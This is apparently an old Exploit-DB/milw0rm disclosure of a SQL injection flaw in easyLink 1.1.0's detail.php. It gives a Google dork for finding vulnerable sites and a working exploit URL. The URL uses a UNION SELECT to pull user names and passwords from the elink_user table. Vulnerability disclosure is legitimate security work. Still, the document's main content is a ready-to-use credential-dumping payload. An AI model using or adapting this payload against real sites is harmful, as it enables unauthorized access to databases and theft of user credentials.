easyLink 1.1.0 - 'detail.php' SQL Injection

EDB-ID:

6494




Platform:

PHP

Date:

2008-09-19


================================================================================
easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
================================================================================



Discovered By: Egypt Coder

home : WWW.Sec-Area.com

Mail: Egyptcoder@hotmail.com



Dork: Engine powered by easyLink V1.1.0.



Exploit :


http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user


Greets  rUnViruS, Error Code, H666p , Fear Master , ProViDoR

# milw0rm.com [2008-09-19]